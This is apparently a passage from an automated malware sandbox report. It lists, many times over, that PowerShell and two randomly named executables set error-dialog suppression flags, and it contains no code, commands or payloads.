                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
